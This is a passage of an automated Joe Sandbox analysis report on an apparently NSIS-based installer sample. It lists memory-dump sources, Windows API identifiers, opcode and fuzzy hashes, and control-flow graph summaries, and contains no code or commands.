• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: \$C@
                                                                                                                                                                                                                                                              • API String ID: 2200240437-1790911818
                                                                                                                                                                                                                                                              • Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 443 408299-4082b9 GetModuleHandleA 444 4082bb-4082be call 40820e 443->444 445 4082cc-4082e1 GetProcAddress 443->445 448 4082c3-4082ca 444->448 446 4082e2-4082e8 445->446 448->445 448->446
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: LoadLibraryExA.KERNELBASE ref: 00408289
                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: UXTHEME$C@$C@
                                                                                                                                                                                                                                                              • API String ID: 2547128583-1808485004
                                                                                                                                                                                                                                                              • Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              APIs
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,00000000), ref: 00401930
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE ref: 004018E0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                                              • API String ID: 15404496-2967466578
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 686 403845-403851 687 403854-403856 686->687 688 4038f0-4038f2 687->688 689 40385c-403868 687->689 690 4038f9-403900 688->690 689->688 691 40386e-403871 call 40165a 689->691 693 403876-40387c 691->693 694 4038f4 693->694 695 40387e-403889 call 40161a 693->695 694->690 698 403895-40389a 695->698 699 40388b-403893 695->699 700 40389c-40389e 698->700 699->700 701 4038a0-4038e6 MulDiv SendMessageA 700->701 702 4038e9-4038eb 700->702 701->702 702->687
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                                                                              • API String ID: 3850602802-3203441087
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 703 407ad4-407ae5 704 407ae8-407ae9 703->704 705 407b2b-407b2e 704->705 706 407aeb-407b25 GetTickCount GetTempFileNameA 704->706 708 407b30-407b37 705->708 706->704 707 407b27-407b29 706->707 707->708
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 709 4097a6-4097ad 710 4097d0-4097e3 709->710 711 4097af-4097ce 709->711 712 409810-40985c 710->712 713 409709-40971c 710->713 711->712 719 409866-40986d 712->719 715 40973d-409755 713->715 716 40971e-40973b 713->716 718 409758-40975e 715->718 716->718 720 409760-409766 718->720 721 40976b-409772 718->721 723 409873-40989a 719->723 724 409917-409932 719->724 727 409b06 720->727 728 408a9f 720->728 725 4099a6-4099ab 721->725 726 409778-4097a4 721->726 730 4098f5-409915 723->730 731 40989c-4098a8 723->731 738 4099ad 724->738 729 4099b2-409b04 725->729 726->720 736 409b09-409b10 727->736 732 408cf5-408cfb 728->732 733 408aa6-408aad 728->733 734 408be7-408bed 728->734 735 408ce7-408cee 728->735 729->736 737 4098ab-4098b1 730->737 731->737 744 408d07-408d3e 732->744 733->729 741 408ab3-408ad1 733->741 745 408bf4-408c01 734->745 742 408cf0 735->742 743 408cab-408cd9 735->743 739 4098b3-4098ba 737->739 740 40985e-409864 737->740 738->729 739->738 746 4098c0-4098f0 739->746 740->719 741->727 747 408ad7-408b42 741->747 748 40995b-409960 742->748 749 408cdb-408ce1 743->749 750 408cfd 743->750 744->713 751 409954-409959 745->751 752 408c07-408c2c 745->752 746->740 753 408b44-408b4b 747->753 754 408b96-408ba9 747->754 748->729 749->735 750->744 751->729 751->748 752->745 755 408c2e-408c3a 752->755 756 408b69-408b90 GlobalAlloc 753->756 757 408b4d-408b63 GlobalFree 753->757 758 408baf-408bb4 754->758 759 408c88-408ca9 755->759 760 408c3c-408c43 755->760 756->727 756->754 757->756 761 408bc1-408be1 758->761 762 408bb6-408bbf 758->762 759->749 763 408c55-408c76 GlobalAlloc 760->763 764 408c45-408c54 GlobalFree 760->764 761->734 762->758 763->727 765 408c7c-408c82 763->765 764->763 765->759
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Global$AllocFree
• API String ID: 3394109436-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: IndirectMessage
                                                                                                                                                                                                                                                              • String ID: NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 1874166685-2653429224
                                                                                                                                                                                                                                                              • Opcode ID: dbe3e938a00ec213380fa1ef53cd97e5e7902b6060af5153ce11b09e6e55bcdc
                                                                                                                                                                                                                                                              • Instruction ID: 9444a1e4a923a48ab17f742abb28227462c63e28ea4dce63fd6a814ca67eb090
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe3e938a00ec213380fa1ef53cd97e5e7902b6060af5153ce11b09e6e55bcdc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48F01776A043089FC750EF2DEA4460537E1EB48318F94C03ED844E7360EB789895CB8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                              • String ID: <@
